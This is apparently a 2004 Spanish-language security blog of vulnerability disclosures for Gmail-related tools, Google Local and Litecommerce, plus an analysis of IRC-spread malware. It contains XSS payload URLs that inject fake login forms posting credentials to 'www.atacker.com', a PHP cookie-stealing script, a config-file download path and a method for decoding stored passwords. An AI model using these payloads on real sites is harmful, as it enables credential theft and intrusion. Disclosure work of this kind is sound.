Multiples XSS vulnerability in Gfhost "Gmail hosting"
Friday, November 05, 2004#############################################
###### Multiples XSS vulnerability in Gfhost
###### "Gmail hosting"
###### vendor Url:http://gfhost.mybesthost.com/
###### vendor notify: yes vendor respose : NO
####### xploit included: yes
#############################################
GFHost es un script que permite que uses tu cuenta de correo de Gmail para crear una página en la cuál se publicarán todos los archivos adjuntos de tus mensajes que esten guardados bajo algún label en tu cuenta de correo.De esta forma cualquier persona que visite tu página podrá descargar todos estos archivos.
Las categorías que están en la página generada por el programa son los labels que tengas en tu cuenta de correo, es decir, si en tu cuenta de correos tienes dos labels ("musica" y "videos") esas serán las categorías que están en tú página
posee una vulnerabilidad la cual permite tanto spofear el sitio atraves de Cross site scripting (XSS) ,asi mismo un usuario mal intencionado podria llegar a subir un archivo al hoting y desde el ejecutar funciones de php por ejemplo ,o realizar en si ataques de tipo XSS con el fin de obtener por ejemplo el usuario y el password de los usuarios incautos
son varios files los que permiten esta accion
y alguno de esos "xploits" podrias ser estos:
file label.php
http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=
http://www.atacker.com/save.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=
30%3E%3Cbr%3EPassword:%3Cinput%20name=password%20type=
text%20maxlength=30%3E%3Cbr%3E%3Cinput%20name=login%20type=
submit%20value=Login%3E%3C/form%3E%3C/body
file dl.php
http://[Target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=config.php
Podemos enviar un archivo a un a categoria determinada(anyfile.php)y despues
usar ese archivo enviado para ejecutar comandos.Los archivos se envian a User_name_account+"Label"@gmail.com
exaple of Anyfile.php
php code to get cookie
$archivo = 'tostada.txt';
$fp = fopen($archivo, "a");
$string = "\n $cookie";
$write = fputs($fp, $string);
fclose($fp);
script to include in the body
location.href="anyfile.php?cookie="+document.cookie+""
atentamente
Lostmon (lostmon@gmail.com)
Thank Ipy she is In my heart
Thanks to http://www.ayuda-internet.net (#Ayuda_Internet) for their support
and thx to Estrella to be my ligth.
--
La curiosidad es lo que hace mover la mente...
Google Local posee agujeros de tipo XSS
##################################################
Google local XSS vulnerability
os: win 2000 sp4 Ie 6.x whith all fixes
vendor url: http://www.google.es/lochp http://local.google.com/
original advisore: http://lostmon.spymac.net/blog/
###################################################
Google Local Te ayuda a buscar en una localizacion en concreto bien sea un provincia o pueblo ,un eterminado local o empresa o otros tipos de busquedas locales.Sin embargo posee alguna falla de seguridad (XSS) si intruducimos una palabra en el cuadro con la etiqueta "que" e introducimos
codigo html en el Form con la etiqueta "donde"este codigo sera ejecutado sin ningun problema.
Una demostracion de esta circunstancia o xploit:
http://www.google.es/local?hl=es&lr=
&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW
EJEMPLO 1
http://local.google.com/local?hl=es&lr=&q
=lalala&near=%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+hacked
+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1%3E%3C%2Fp%3
E%3Cp%3ENo+les+abandones+%2C+ellos+no+lo+harian%3C%2Fp%3E%3C
img+src%3D%22http%3A%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2F
Gata_Misha_con_cria.jpg%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3
E&btnG=B%C3%BAsqueda
y pq no pedirle usuario y password al usuario incauto ???
http://local.google.com/local?hl=es&lr=&q=cafe
&near=%3Cbody%3E%3Cform%20action%3D%22http%3A%2
F%2Fwww.atacker.com%2Fsave2db.asp%22+method%3D%22
post%22%3EUsername%3A%3Cinput+name%3D%22username%
22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr
%3EPassword%3A%3Cinput+name%3D%22password%22+type%
3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput
+name%3D%22login%22+type%3D%22submit%22+value%3D%22Login
%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=B%C3%BAsquedasecuritytracker url: http://www.securitytracker.com/alerts/2004/Nov/1012081.html
Atentamente:
Lostmon (Lostmon@Gmail.com)
Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****
--
La curiosidad es lo que hace mover la mente....A Dia de Hoy parece haber sido solucionada esta situacion 05/11/2004
XSS iN Goollery Gmail script for view Photo Galery
##############################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################
Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.
Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.
#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################
Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.
Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.
#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################
http://[TARGET]/goollery/viewalbum.php?conversation_id=
ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17
Escritura en pagina lo cual nos permitiria spofear el sitio...
http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=
ffee00b71f3931a&btopage=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17
Atentamente:
Lostmon (Lostmon@Gmail.com)
Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****
OSVDB url: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=goollery
Securitytracker url: http://securitytracker.com/alerts/2004/Nov/1012062.html
--
La curiosidad es lo que hace mover la mente
Gmail suit deja ver el password codificado y este puede ser descodificado
Gmail Suit es una aplicacion que ofrece diferentes
utilidades para gmail y añade menus contextuales
a nuestro explorer para poder tanto consultar como enviar
correos a gmail desde dicha suit
Gmail suit una vez instalado deja en la carpeta de usuario
(documents and settingsuser_nameApplication DataGSuit )
crea un archivo llamado settings.xml
si miramos dentro de este archivo vemos varios datos
1- el nombre de usuario de la cuenta de gmail
2- el password codificado de alguna manera
el password codificado tiene la misma longitud de caracteres
que el password en texto plano introducido por el usuario
faltaria saber como descodificarlo que seria tan sencillo como
pasar caracter por caracter a su valor ASCII (http://www.bbsinc.com/symbol.html)
restarle 128 y el resultado mirar en la tabla ASCII y tendremos el caracter
correcto del password
ejemplo:
ì=(236-128)=108 108 = l
otro caracter
á=(225-128)=97 97=a
caracter a caracter podriamos descodificar el password
ìïéóìáîå=loislane
securitytracker url: http://securitytracker.com/alerts/2004/Oct/1011994.html
OSVDB ID : 11176
atentamente:
Lostmon (lostmon@gmail.com)
Thank Ipy and [D]aRk You are The best friends
Thanks to http://www.Ayuda-Internet.net (#Ayuda_Internet) for support
and thx to Estrella to be my ligth.
--
La curiosidad es lo que hace mover la mente....
NEW RELEASE GSuite R14 DATE 30-10-2004
http://kb.imspire.com/support/2004-11-A.html
Gmail deja ver la lista de contactos a un usuario local
Gmail deja ver la lista de contactos a un usuario local
Procedimiento:
Abrimos nuestro navegador, y vamos a la web Http://Gmail.google.com
y tenemos acceso a nuestra cuenta.Escribimos nuestros correos, las actividades y cerramos el navegador,o nuestra sesión, es igual. inmediatamente abrimos a nuestro explorador de Windows, los archivos temporales de Internet y tomamos los archivos temporales de Gmail. Copiamos estos archivos en una carpeta, y entonces con el notepad abrimos los archivos del siguientes:
etc.
Uno de estos archivos contiene la lista con todos nuestros contactos, y cualquiera usuario,mirando nuestros ficheros temporales en esta PC, podría tener acceso y ver a los contactos de nuestros gmail
atentamente
Lostmon (lostmon@gmail.com )
Thanks to LuTRiZiA always in my mind
Thanks to http://www.ayuda-internet.net(#Ayuda_Internet) for support
and thx to Estrella to be my ligth.
La curiosidad es lo que hace mover la mente...
Gmail drive deja ver el nombre de usuario y da acceso a la cuenta de correo
Ante la avalancha de gente que usa la nueva funcionalidad para gmail
gmail drive (http://www.viksoe.dk/code/gmail.htm)Se ha descubierto que un usuario local podria obtener el nombre de usuario con el que se inicio sesion en el disco siva a mi pc , mira las propiedades del disco de Gmail y en la etiqueta de volumen estara el nombre de usuario que inicio sesion en el disco...
Si ademas marcamos la opcion de "auto login" un usuario local ademas podria abrir el navegador, dirigirse a la direccion http://gmail.google.com y al estar ya logeado en el Gmail drive ..seria automaticamente redirigido hacia la cuenta de correo del usuario
Atentamente
Lostmon ( lostmon@gmail.com )
OSVDB ID 10940
http://www.securitytracker.com/alerts/2004/Oct/1011758.html
thx to www.Ayuda-Internet.net for their support
thx to Ghalician he is whith me and investigate :)
La curiosidad es lo que hace mover la mente....
Virus/malware activo por las redes de IRC
Ante la oleada de infeciones producidas por un virus/malware activo en la red de Irc-Hispano,y otras redes, desde #ayuda_internet ,
preocupados por esta infección, que cada dia se esta extendiendo mas ,
decidimos investigar cual podria ser la causa de la situacion e intentar
llegar cuanto antes a una solucion rapida y eficaz para el usuario que visita la red.
Asi os exponemos hoy el resultado de ese análisis o de esa investigación
para asi ...en conocimiento de todos intentemos por lo menos ,no quedar
infectados o si lo estubiesemos intentar desinfectarnos cuanto antes.
Analisis de la situación:
Los que sois asiduos al canal os habreis dado cuenta de que
ultimamente nuestro bot banea muy seguido a una serie de usuarios que
hacen spam por privado...
El motivo no es otro que intentar protegeros de la amenaza de ese
virus ..el "modus operandi" de ese virus es el siguiente:
Entran usuarios con un nick aleatorio a una red de irc ,entran en un
canal o varios y dejan por privado o por el general una url ,el usuario
incauto que clica en ellas,y descarga el programa malware y lo ejecuta
queda infectado.
=============================
url "capturadas" son estas:
=============================
http://hotgirl.such.info If you love amateurs... real amateurs, this
is the best site on the net. Don't wait another second for these porn star wannabe's! CLICK HERE NOW -your ***** will thank you!
http://hardporn.be.tf The most provocative and fantastic ,high tempo
hard porn,fliery *****ing scenes,school girls,crazy lolitas all of them
are in this web
http://smssend.tr.gs Text Message anyone worldwide free with
International SMS Messaging No signup required..! iF you want to send
only click this site..!
http://newmp3s.gen.ms Click Here! Free Downloads AZ, Full Mp3 Albums,
New Mp3 Albums ..
http://freemp3.here.ws Do you want to Listen All of the Singer's New
album and New SingLes..? aLso it Ýs free..! only click This Site..!
Full albums and a Lot of mp3 Free..!
===========================================================
Despues de hacer un seguimiento de las webs e intentar "ver" el
motivo por el cual puede pasar esto y que referencia tiene con esas
webs ,nos damos cuenta de que todas las url llevan a una misma web
desde la cual se descargan archivos con doble extension
La web donde llevan es a esta http://cyprusturk.net/porn/
web que guarda en ese directorio varios archivos exe para descargar,
dependiendo del dominio desde el que se venga algunos ejemplos son estos :
asiavideo.mpeg.exe
sex.mpeg.exe
good.mp3.exe
real.mp3.exe
Lleva a muchos mas con diferentes nombres y diferentes primeras
extensiones,es algo deliverado ,pues se incluye en el exe el icono perteneciente a la extension mpeg o mp3 con lo cual el usuario mediano llegaria a ejecutar esa "pelicula" o ese "mp3" y entonces es cuando el exe es desempaquetado y instalado.Por el analisis de algunas de esos archivos llegamos a la siguiente informacion :
********************************************************************
FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
********************************************************************
File: C:Do*****ents and
SettingsadministradorEscritoriohispanogood.mp3.exe
Date: 13/09/2004 17:47:29
***** General ******************************************************
Location: C:Do*****ents and SettingsadministradorEscritoriohispano
Size: 4823545
Version: 1.6.0.0
CRC-32: 9F6F50FC
MD5: CE6CD747A6C8A62334290EE8E85D5EBB
Read only: No
Hidden: No
System file: No
Directory: No
Archive: Yes
Symbolic link: No
Time stamp: lunes, 13 de septiembre de 2004 17:24:36
Creation: lunes, 13 de septiembre de 2004 17:03:02
Last access: lunes, 13 de septiembre de 2004 17:43:28
Last write: lunes, 13 de septiembre de 2004 17:24:36
***** Version ******************************************************
Supported languages:: Inglés (Estados Unidos) (1033/1252)
--- Version --------------------------------------------------------
File version: 1, 6, 0
Company name: instyler installation software
Internal name: setup.exe
Comments: www.instyler.com info@instyler.com
Legal copyright: Copyright © 2000 Sebastian Brand
Legal trademarks:
Original filename: setup.exe
Product name: instyler ex-it!
Product version: 1, 6, 0
File description: instyler ex-it! Self-Extractor
Private build:
Special build:
***** Resources ****************************************************
--- Cursor ---------------------------------------------------------
1
2
3
4
5
6
--- Bitmap ---------------------------------------------------------
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
CDROM
CLOSEDFOLDER
CURRENTFOLDER
EXECUTABLE
FLOPPY
HARD
KNOWNFILE
NETWORK
OPENFOLDER
RAM
TNEWBEVEL
TNEWGAUGE
UNKNOWNFILE
--- Icon -----------------------------------------------------------
1
2
3
4
--- String Table ---------------------------------------------------
3841
3842
3843
3844
3845
3846
3847
3848
3849
3850
3851
3852
3853
4089
4090
4091
4093
4094
4095
--- RCData ---------------------------------------------------------
TFLIC
TFOLFORM
TINSTALLFORM
TMAINFORM
TPWDFORM
--- Cursor Group ---------------------------------------------------
32762
32763
32764
32765
32766
32767
--- Icon Group -----------------------------------------------------
MAINICON
--- Version Info ---------------------------------------------------
1
--- XP Manifest ----------------------------------------------------
1
?xml version="1.0" encoding="UTF-8" standalone="yes"?
assembly xmlns="urn:schemas-microsoft-com:asm.v1"
manifestVersion="1.0"
assemblyIdentity
name="Your.Application.Name.Here"
processorArchitecture="x86"
version="1.0.0.0"
type="win32"/
description Windows Shell /description
dependency
dependentAssembly
assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="x86"
publicKeyToken="6595b64144ccf1df"
language="*"
dependentAssembly
/dependency
/assembly
***** PE Header ****************************************************
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0008
Time/Date stamp: 2A425E19
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 818F
Magic: 010B
Linker version (major): 02
Linker version (minor): 19
Size of code: 00036A00
Size of initialized data: 0000FC00
Size of uninitialized data: 00000000
Address of entry point: 00037468
Base of code: 00001000
Base of data: 00038000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0001
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 0004E000
Size of headers: 00000400
Checksum: 00000000
Sub system: 0002 - Windows graphical user interface
(GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00004000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010
***** PE Sections **************************************************
CRC-32: ?
MD5: ?
----- PE Sections --------------------------------------------------
Section VirtSize VirtAddr PhysSize PhysAddr Flags
CODE 00036854 00001000 00036A00 00000400 60000020
DATA 00001DE4 00038000 00001E00 00036E00 C0000040
BSS 00002508 0003A000 00000000 00038C00 C0000000
.idata 00001CBA 0003D000 00001E00 00038C00 C0000040
.tls 00000008 0003F000 00000000 0003AA00 C0000000
.rdata 00000018 00040000 00000200 0003AA00 50000040
.reloc 000033D8 00041000 00000000 00000000 50000040
.rsrc 00008A00 00045000 00008A00 0003AC00 50000040
***** Import/Export table ******************************************
--- Export table ---------------------------------------------------
--- Import table (libraries: 12) -----------------------------------
kernel32.dll (imports: 36)
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
WideCharToMultiByte
TlsSetValue
TlsGetValue
SetCurrentDirectoryA
RemoveDirectoryA
MultiByteToWideChar
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetCommandLineA
GetCurrentDirectoryA
ExitThread
CreateThread
CreateDirectoryA
WriteFile
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
MoveFileA
GetStdHandle
GetFileSize
GetFileType
ExitProcess
DeleteFileA
CreateFileA
CloseHandle
user32.dll (imports: 1)
MessageBoxA
oleaut32.dll (imports: 5)
VariantChangeTypeEx
VariantCopyInd
VariantClear
SysStringLen
SysAllocStringLen
advapi32.dll (imports: 6)
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
kernel32.dll (imports: 64)
WriteFile
WinExec
WaitForSingleObject
VirtualAlloc
TerminateThread
SizeofResource
SetFileTime
SetFilePointer
SetFileAttributesA
SetErrorMode
SetCurrentDirectoryA
ResumeThread
ReadFile
MultiByteToWideChar
MulDiv
LockResource
LocalFileTimeToFileTime
LoadResource
LoadLibraryA
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetWindowsDirectoryA
GetVolumeInformationA
GetVersionExA
GetVersion
GetSystemDirectoryA
GetSystemDefaultLCID
GetShortPathNameA
GetProcAddress
GetModuleFileNameA
GetLogicalDrives
GetLocaleInfoA
GetLastError
GetFullPathNameA
GetFileAttributesA
GetExitCodeThread
GetExitCodeProcess
GetEnvironmentVariableA
GetDriveTypeA
GetCurrentThreadId
GetCurrentProcessId
GetCurrentProcess
FreeResource
FreeLibrary
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
DosDateTimeToFileTime
DeleteFileA
CreateThread
CreateProcessA
CreateFileA
CreateDirectoryA
CompareStringA
CloseHandle
mpr.dll (imports: 1)
WNetGetConnectionA
version.dll (imports: 3)
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll (imports: 58)
UnrealizeObject
TextOutA
StretchDIBits
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetEnhMetaFileBits
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
PlayEnhMetaFile
PatBlt
MoveToEx
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPointA
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetCurrentPositionEx
GetClipBox
GetBitmapBits
ExcludeClipRect
EnumFontsA
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreateRectRgn
CreatePenIndirect
CreatePalette
CreateFontIndirectA
CreateDIBitmap
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll (imports: 135)
WindowFromPoint
WinHelpA
WaitMessage
WaitForInputIdle
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowOwnedPopups
ShowCursor
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClassA
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OffsetRect
OemToCharA
MessageBoxA
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRgn
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetSystemMetrics
GetSystemMenu
GetSysColor
GetSubMenu
GetScrollPos
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableMenuItem
DrawTextA
DrawMenuBar
DrawIcon
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreateWindowExA
CreatePopupMenu
CreateMenu
CreateIcon
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharLowerBuffA
CharLowerA
CharUpperBuffA
AdjustWindowRectEx
comctl32.dll (imports: 12)
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Destroy
ImageList_Create
ole32.dll (imports: 3)
CoCreateInstance
CoUninitialize
CoInitialize
shell32.dll (imports: 1)
ShellExecuteA
********************************************************************
FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
********************************************************************
Estamos en un seguimiento mayor de esta situacion ya que cada vez son
mas los usuarios que dia a dia entran en el irc y dejan el link hacia
la web ...lo que nos hace pensar que sea lo ke sea se esta extendiendo
y deprisa ... pues en apenas dos dias hemos pasado de uno o dos
usuarios o bots que entraban a ya casi los 100 por dia en diferentes
canales.
Despues de observar esta situacion y pensar en que hacer , decidimos
enviar muestras a las casas antivirus (panda,mcaffe,bitdefender,avp y
alguno mas) hasta ahora solo mcaffe contesto a nuestro rekerimiento
,contestando
sobre el archivo de muestra enviado lo siguiente :
==================================
fwd del mail de mcaffe con la respuesta :
==================================
From: Virus Research virus_research@avertlabs.com
Date: Mon, 13 Sep 2004 12:15:50 -0700
Subject: RE: Escalation: 1301426 - Re: posible nuevo virus ???
To: Lostmon lostmon@gmail.com
A.V.E.R.T. Sample Analysis
Issue Number:1301426
Virus Research Analyst: Brant Yaeger
Identified: mrsn.ex ... Found application HideWindow.
ping.hlp ... Found the IRC/Flood.bi trojan !!!
rebot.dll ... Found application IRC/Flood.tool.
Symad.ex ... Found application Tool-WGet.
tuqa.dll ... Found application IRC/Flood.tool.
Windows.icm ... Found the IRC/Flood.dt trojan !!!
zerz.dll ... Found the IRC/Seiseni.worm virus !!!
AVERT(tm) Labs, Beaverton, OR
Thank you for submitting your suspicious files.
Synopsis -
This malware can be identified and removed with our current scanners
(Version 4x Engine 4.2.60 + the current DAT).
In order to get the fastest possible response, you may wish to submit future
virus-samples to http://www.webimmune.net. In most cases it can respond
almost instantly with a solution.
More and more malware threats are taking advantage of open file and printer
shares to spread, without users having to actually execute any files.
If your computer is not networked with other machines, there is no need to
have file and printer sharing installed, so it should be disabled. If your
computer is networked with others, you may need to have some level of file
and printer sharing. In either case, if you are affected by one of these
threats, you may need to adjust your level of file and printer sharing to
take care of the problem.
Please consult with your administrator before making any changes on your
own, if you're on a LAN.
For other virus-related information, please see the AVERT homepage at:
http://vil.mcafeesecurity.com/vil/default.asp
Solution -
If you are using an Engine older than what is current, we strongly recommend
that you upgrade as, in a lot of cases, an old engine will not identify and
remove certain malware (even with a current set of DAT files). So, as well
as DAT files, engines need to be updated to include regular changes and
improvements made to the scanner.
=======================================================
Lo cual en resumidas cuentas dice viene a decir ...que si que hay
codigo virico en esos
programas o esos exe que son descargados...y ademas nos proporcionan
las partes de esos virus o
malware( los payloads),que son los archivos que se instalan en sistema
una vez ejecutado el exe ...
Despues de haber echo algunas pruebas con algun antivirus
por ahora solo mcaffe nos lo ha detectado con el engine 4.x y las
ultimas bases de datos del antivirus ( el dat ke contiene las firmas
de virus).. revisar esta informacion y intentar no clicar en ninguna
web quie no conozcais ,y si por lo ke sea llegais a una de esas webs
ni se os ocurra ejecutar el exe ke se descarga ,si usais opera o otro
navegador que no sea explorer , lo vereis enseguida pues en la ventana
de descarga vereis la doble extension y la ultima sera un exe ..ir
con cuidado.
atentamente:
El equipo de #ayuda_internet
http://www.ayuda-internet.net
La ayuda ..nuestra razón de ser.
Tiendas vistuales basadas en Litecommerce vulnerables
En los ultimos das surgio una vulnerabilidad en postnuke
(http://www.securitytracker.com/alerts/2004/Jul/1010755.html)
despues de leer el advisore y buscar en google con fines estadisticos los posibles sites vulnerables,me di cuenta de que no todos los links ivan a dar digamos a paginas normales en postnuke, si no que algunos de esos link ivan directamente al archivo de instalacion de un tipo de tienda virtual llamada litecommerce (http://www.litecommerce.com/) en una instalacion por defecto ,la tienda deja un archivo llamado 'install.php' como en el bug anterior de postnuke,desde ese archivo podemos iniciar la instalacion de la tienda virtual remotamente.podriamos reconfigurar el site completamente,pass de la base de datos,contenidos dela tienda ,percios y demas.todo seria perfecto si ... en algunas de las interfaces encontradas no pidiera el 'auth code ' es como el serial de proteccion ,para el uso indebido del script.No es en todas las interfaces que pide ese codig ,encontramos versiones 2.0.0 con el form para el code y la misma version,sin el form ,lo cual si permitia la instalacion,y configuracion del sitepara explotar la vulnerabilidad ,bastaria con encuntrar ese archivo ,que suele estar aqui: http://www.hosts.com/install.php http://www.host.com/path_to_shop/install.php
no he tenido acceso a un numero de serie estandar del soft para poder establecer,o decir si con cualkier numero del programa ,podria iniciarse la instalacion en cualkier site que estubiese basado en litecommerce
thx to http://www.ayuda-internet.net/ por su apoyo :)
thx Estrella ya sabes que eres mi luz ;P
thx to Rottew & Lutrizia formamos buena familia no ?? :DD
by lostmon (lostmon@gmail.com)
Securitytracker url: http://securitytracker.com/alerts/2004/Jul/1010778.html
La curiosidad es lo que hace mover la mente
Subscribe to:
Posts (Atom)
Posts
